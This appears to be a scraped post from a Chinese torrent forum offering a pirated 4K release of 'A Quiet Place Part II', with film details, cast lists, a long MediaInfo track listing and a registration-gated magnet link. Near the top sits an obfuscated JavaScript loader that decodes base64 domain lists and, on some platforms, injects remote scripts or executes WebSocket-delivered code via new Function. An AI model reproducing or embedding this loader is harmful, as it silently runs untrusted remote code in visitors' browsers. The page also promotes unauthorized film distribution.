寂静之地2[简繁字幕]A.Quiet.Place.Part.II.2020.2160p.WEB-DL.DDP5.1.Atmos.HDR.HEVC-迅雷下载 10.29GB

版主小s 11天前 270

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 寂静之地2 / 无声绝境II(港) / 噤界II(台) / A Quiet Place 2

◎片 名 A Quiet Place: Part II

◎年 代 2021

◎产 地 美国

◎类 别 科幻 / 惊悚 / 恐怖

◎语 言 英语

◎上映日期 2021-05-28(中国大陆/美国)

◎IMDb链接 https://www.imdb.com/title/tt8332922/

◎豆瓣评分 6.5/10 (108222人评价)

◎豆瓣链接 https://movie.douban.com/subject/30206311/

◎片 长 97分钟

◎导 演 约翰·卡拉辛斯基 John Krasinski (id:1027146)

◎编 剧 约翰·卡拉辛斯基 John Krasinski (id:1027146)

斯科特·贝克 Scott Beck (id:1029358)

布莱恩·伍兹 Bryan Woods (id:1052734)

◎演 员 艾米莉·布朗特 Emily Blunt (id:1041022)

基里安·墨菲 Cillian Murphy (id:1047992)

米利森特·西蒙兹 Millicent Simmonds (id:1374192)

诺亚·尤佩 Noah Jupe (id:1356120)

约翰·卡拉辛斯基 John Krasinski (id:1027146)

杰曼·翰苏 Djimon Hounsou (id:1044880)

奥基里特·奥诺多瓦 Okieriete Onaodowan (id:1382437)

斯科特·麦克纳里 Scoot McNairy (id:1302972)

扎卡里·戈林格 Zachary Golinger (id:1457353)

布莱克·德隆 Blake DeLong (id:1457674)

加里·桑当 Gary Sundown (id:1457675)

阿什利·戴克 Ashley Dyke (id:1366174)

韦恩·杜瓦尔 Wayne Duvall (id:1019154)

克兹托夫·克里斯·马杜拉 Krzysztof 'Kris' Mardula (id:1419252)

阿利森·西格 Allyson Seeger (id:1457351)

乔安·佩里塔诺 JoAnn Perritano (id:1392782)

迈克尔·贝 Michael Bay (id:1027776)

安德鲁·福姆 Andrew Form (id:1457352)

布拉德利·福勒 Bradley Fuller (id:1284314)

约翰·卡拉辛斯基 John Krasinski (id:1027146)

马可·贝尔崔米 Marco Beltrami (id:1027998)

波莉·摩根 Polly Morgan (id:1429254)

劳拉·罗森塔尔 Laura Rosenthal (id:1296112)

杰西·冈作 Jess Gonchor (id:1010149)

南茜·黑格 Nancy Haigh (id:1285800)

卡西娅·瓦利卡-麦蒙 Kasia Walicka-Maimone (id:1290762)

◎标 签 惊悚 / 恐怖 / 美国 / 科幻 / 惊恐 / 2021 / 悬疑 / 超自然

◎简 介

故事紧承上一部展开。在丈夫为保护家人牺牲后,伊芙琳(艾米莉·布朗特 饰)不得不独自带着孩子们(米莉森·西蒙斯、诺亚·尤佩 饰)面对全新的生存挑战。他们将被迫离开家园,踏上一段未知的旅途。在无声的世界里,除了要躲避“猎声怪物”的捕杀,铺满细沙的道路尽头还暗藏着新的危机。

  1. General

  2. Unique ID : 92499760394367186801039040672635952657 (0x4596CE4B7A94F03790BFB13E4F661E11)

  3. Complete name : A.Qu[email protected]BBQDDQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 10.3 GiB

  7. Duration : 1 h 37 min

  8. Overall bit rate : 15.2 Mb/s

  9. Encoded date : UTC 2021-06-27 23:19:17

  10. Writing application : mkvmerge v56.0.0 ('Strasbourg / St. Denis') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : HEVC

  15. Format/Info : High Efficiency Video Coding

  16. Format profile : Main [email protected]@High

  17. HDR format : SMPTE ST 2086, HDR10 compatible

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 37 min

  20. Bit rate : 14.4 Mb/s

  21. Width : 3 840 pixels

  22. Height : 1 606 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0 (Type 2)

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.097

  30. Stream size : 9.76 GiB (95%)

  31. Default : Yes

  32. Forced : No

  33. Color range : Limited

  34. Color primaries : BT.2020

  35. Transfer characteristics : PQ

  36. Matrix coefficients : BT.2020 non-constant

  37. Mastering display color primaries : Display P3

  38. Mastering display luminance : min: 0.0050 cd/m2, max: 1000 cd/m2

  39. Maximum Content Light Level : 1450 cd/m2

  40. Maximum Frame-Average Light Level : 278 cd/m2


  41. Audio

  42. ID : 2

  43. Format : E-AC-3 JOC

  44. Format/Info : Enhanced AC-3 with Joint Object Coding

  45. Commercial name : Dolby Digital Plus with Dolby Atmos

  46. Codec ID : A_EAC3

  47. Duration : 1 h 37 min

  48. Bit rate mode : Constant

  49. Bit rate : 768 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : L R C LFE Ls Rs

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 31.250 FPS (1536 SPF)

  54. Compression mode : Lossy

  55. Stream size : 533 MiB (5%)

  56. Title : English

  57. Language : English

  58. Service kind : Complete Main

  59. Default : Yes

  60. Forced : No

  61. Complexity index : 16

  62. Number of dynamic objects : 15

  63. Bed channel count : 1 channel

  64. Bed channel configuration : LFE


  65. Text #1

  66. ID : 3

  67. Format : UTF-8

  68. Codec ID : S_TEXT/UTF8

  69. Codec ID/Info : UTF-8 Plain Text

  70. Duration : 47 min 28 s

  71. Bit rate : 3 b/s

  72. Count of elements : 69

  73. Stream size : 1.26 KiB (0%)

  74. Title : English [Forced]

  75. Language : English

  76. Default : No

  77. Forced : Yes


  78. Text #2

  79. ID : 4

  80. Format : UTF-8

  81. Codec ID : S_TEXT/UTF8

  82. Codec ID/Info : UTF-8 Plain Text

  83. Duration : 1 h 35 min

  84. Bit rate : 10 b/s

  85. Count of elements : 329

  86. Stream size : 7.61 KiB (0%)

  87. Title : European Spanish

  88. Language : Spanish

  89. Default : No

  90. Forced : No


  91. Text #3

  92. ID : 5

  93. Format : UTF-8

  94. Codec ID : S_TEXT/UTF8

  95. Codec ID/Info : UTF-8 Plain Text

  96. Duration : 1 h 35 min

  97. Bit rate : 9 b/s

  98. Count of elements : 299

  99. Stream size : 6.95 KiB (0%)

  100. Title : French

  101. Language : French

  102. Default : No

  103. Forced : No


  104. Text #4

  105. ID : 6

  106. Format : UTF-8

  107. Codec ID : S_TEXT/UTF8

  108. Codec ID/Info : UTF-8 Plain Text

  109. Duration : 1 h 35 min

  110. Bit rate : 10 b/s

  111. Count of elements : 322

  112. Stream size : 7.49 KiB (0%)

  113. Title : Portuguese

  114. Language : Portuguese

  115. Default : No

  116. Forced : No


  117. Text #5

  118. ID : 7

  119. Format : UTF-8

  120. Codec ID : S_TEXT/UTF8

  121. Codec ID/Info : UTF-8 Plain Text

  122. Duration : 1 h 35 min

  123. Bit rate : 10 b/s

  124. Count of elements : 326

  125. Stream size : 7.49 KiB (0%)

  126. Title : Polish

  127. Language : Polish

  128. Default : No

  129. Forced : No


  130. Text #6

  131. ID : 8

  132. Format : UTF-8

  133. Codec ID : S_TEXT/UTF8

  134. Codec ID/Info : UTF-8 Plain Text

  135. Duration : 1 h 35 min

  136. Bit rate : 11 b/s

  137. Count of elements : 331

  138. Stream size : 7.90 KiB (0%)

  139. Title : Turkish

  140. Language : Turkish

  141. Default : No

  142. Forced : No


  143. Text #7

  144. ID : 9

  145. Format : UTF-8

  146. Codec ID : S_TEXT/UTF8

  147. Codec ID/Info : UTF-8 Plain Text

  148. Duration : 1 h 35 min

  149. Bit rate : 11 b/s

  150. Count of elements : 328

  151. Stream size : 7.97 KiB (0%)

  152. Title : Swedish

  153. Language : Swedish

  154. Default : No

  155. Forced : No


  156. Text #8

  157. ID : 10

  158. Format : UTF-8

  159. Codec ID : S_TEXT/UTF8

  160. Codec ID/Info : UTF-8 Plain Text

  161. Duration : 1 h 35 min

  162. Bit rate : 9 b/s

  163. Count of elements : 311

  164. Stream size : 6.89 KiB (0%)

  165. Title : Danish

  166. Language : Danish

  167. Default : No

  168. Forced : No


  169. Text #9

  170. ID : 11

  171. Format : UTF-8

  172. Codec ID : S_TEXT/UTF8

  173. Codec ID/Info : UTF-8 Plain Text

  174. Duration : 1 h 35 min

  175. Bit rate : 11 b/s

  176. Count of elements : 333

  177. Stream size : 8.05 KiB (0%)

  178. Title : Finnish

  179. Language : Finnish

  180. Default : No

  181. Forced : No


  182. Text #10

  183. ID : 12

  184. Format : UTF-8

  185. Codec ID : S_TEXT/UTF8

  186. Codec ID/Info : UTF-8 Plain Text

  187. Duration : 1 h 35 min

  188. Bit rate : 10 b/s

  189. Count of elements : 333

  190. Stream size : 7.12 KiB (0%)

  191. Title : Norwegian

  192. Language : Norwegian

  193. Default : No

  194. Forced : No


  195. Text #11

  196. ID : 13

  197. Format : UTF-8

  198. Codec ID : S_TEXT/UTF8

  199. Codec ID/Info : UTF-8 Plain Text

  200. Duration : 1 h 35 min

  201. Bit rate : 17 b/s

  202. Count of elements : 331

  203. Stream size : 12.4 KiB (0%)

  204. Title : Russian

  205. Language : Russian

  206. Default : No

  207. Forced : No


  208. Text #12

  209. ID : 14

  210. Format : UTF-8

  211. Codec ID : S_TEXT/UTF8

  212. Codec ID/Info : UTF-8 Plain Text

  213. Duration : 1 h 35 min

  214. Bit rate : 17 b/s

  215. Count of elements : 339

  216. Stream size : 12.4 KiB (0%)

  217. Title : Ukrainian

  218. Language : Ukrainian

  219. Default : No

  220. Forced : No


  221. Text #13

  222. ID : 15

  223. Format : UTF-8

  224. Codec ID : S_TEXT/UTF8

  225. Codec ID/Info : UTF-8 Plain Text

  226. Duration : 1 h 35 min

  227. Bit rate : 10 b/s

  228. Count of elements : 334

  229. Stream size : 7.69 KiB (0%)

  230. Title : Hungarian

  231. Language : Hungarian

  232. Default : No

  233. Forced : No


  234. Text #14

  235. ID : 16

  236. Format : UTF-8

  237. Codec ID : S_TEXT/UTF8

  238. Codec ID/Info : UTF-8 Plain Text

  239. Duration : 1 h 35 min

  240. Bit rate : 17 b/s

  241. Count of elements : 324

  242. Stream size : 12.5 KiB (0%)

  243. Title : Greek

  244. Language : Greek

  245. Default : No

  246. Forced : No


  247. Text #15

  248. ID : 17

  249. Format : UTF-8

  250. Codec ID : S_TEXT/UTF8

  251. Codec ID/Info : UTF-8 Plain Text

  252. Duration : 1 h 35 min

  253. Bit rate : 14 b/s

  254. Count of elements : 336

  255. Stream size : 10.2 KiB (0%)

  256. Title : Hebrew

  257. Language : Hebrew

  258. Default : No

  259. Forced : No


  260. Text #16

  261. ID : 18

  262. Format : UTF-8

  263. Codec ID : S_TEXT/UTF8

  264. Codec ID/Info : UTF-8 Plain Text

  265. Duration : 1 h 35 min

  266. Bit rate : 15 b/s

  267. Count of elements : 335

  268. Stream size : 10.9 KiB (0%)

  269. Title : Arabic

  270. Language : Arabic

  271. Default : No

  272. Forced : No


  273. Text #17

  274. ID : 19

  275. Format : UTF-8

  276. Codec ID : S_TEXT/UTF8

  277. Codec ID/Info : UTF-8 Plain Text

  278. Duration : 1 h 35 min

  279. Bit rate : 10 b/s

  280. Count of elements : 326

  281. Stream size : 7.32 KiB (0%)

  282. Title : Czech

  283. Language : Czech

  284. Default : No

  285. Forced : No


  286. Text #18

  287. ID : 20

  288. Format : UTF-8

  289. Codec ID : S_TEXT/UTF8

  290. Codec ID/Info : UTF-8 Plain Text

  291. Duration : 1 h 35 min

  292. Bit rate : 10 b/s

  293. Count of elements : 325

  294. Stream size : 7.57 KiB (0%)

  295. Title : Indonesian

  296. Language : Indonesian

  297. Default : No

  298. Forced : No


  299. Text #19

  300. ID : 21

  301. Format : UTF-8

  302. Codec ID : S_TEXT/UTF8

  303. Codec ID/Info : UTF-8 Plain Text

  304. Duration : 1 h 35 min

  305. Bit rate : 11 b/s

  306. Count of elements : 333

  307. Stream size : 7.90 KiB (0%)

  308. Title : Malay

  309. Language : Malay

  310. Default : No

  311. Forced : No


  312. Text #20

  313. ID : 22

  314. Format : UTF-8

  315. Codec ID : S_TEXT/UTF8

  316. Codec ID/Info : UTF-8 Plain Text

  317. Duration : 1 h 35 min

  318. Bit rate : 14 b/s

  319. Count of elements : 329

  320. Stream size : 9.98 KiB (0%)

  321. Title : Vietnamese

  322. Language : Vietnamese

  323. Default : No

  324. Forced : No


  325. Text #21

  326. ID : 23

  327. Format : UTF-8

  328. Codec ID : S_TEXT/UTF8

  329. Codec ID/Info : UTF-8 Plain Text

  330. Duration : 1 h 35 min

  331. Bit rate : 10 b/s

  332. Count of elements : 331

  333. Stream size : 7.02 KiB (0%)

  334. Title : Cantonese

  335. Language : Chinese

  336. Default : No

  337. Forced : No


  338. Text #22

  339. ID : 24

  340. Format : UTF-8

  341. Codec ID : S_TEXT/UTF8

  342. Codec ID/Info : UTF-8 Plain Text

  343. Duration : 1 h 35 min

  344. Bit rate : 11 b/s

  345. Count of elements : 331

  346. Stream size : 7.76 KiB (0%)

  347. Title : Chinese (Simplified)

  348. Language : Chinese

  349. Default : No

  350. Forced : No


  351. Text #23

  352. ID : 25

  353. Format : UTF-8

  354. Codec ID : S_TEXT/UTF8

  355. Codec ID/Info : UTF-8 Plain Text

  356. Duration : 1 h 35 min

  357. Bit rate : 9 b/s

  358. Count of elements : 330

  359. Stream size : 6.65 KiB (0%)

  360. Title : Chinese (Traditional)

  361. Language : Chinese

  362. Default : No

  363. Forced : No


  364. Text #24

  365. ID : 26

  366. Format : UTF-8

  367. Codec ID : S_TEXT/UTF8

  368. Codec ID/Info : UTF-8 Plain Text

  369. Duration : 1 h 35 min

  370. Bit rate : 10 b/s

  371. Count of elements : 346

  372. Stream size : 7.52 KiB (0%)

  373. Title : Japanese

  374. Language : Japanese

  375. Default : No

  376. Forced : No


  377. Menu

  378. 00:00:00.000 : Scene 1

  379. 00:06:39.107 : Scene 2

  380. 00:12:16.319 : Scene 3

  381. 00:17:00.270 : Scene 4

  382. 00:26:28.171 : Scene 5

  383. 00:33:26.339 : Scene 6

  384. 00:38:06.703 : Scene 7

  385. 00:45:53.753 : Scene 8

  386. 00:51:18.036 : Scene 9

  387. 00:55:35.919 : Scene 10

  388. 01:02:21.282 : Scene 11

  389. 01:08:43.832 : Scene 12

  390. 01:16:31.925 : Scene 13

  391. 01:21:25.885 : Scene 14

  392. 01:28:11.833 : Scene 15






此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 惊悚 恐怖 科幻

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回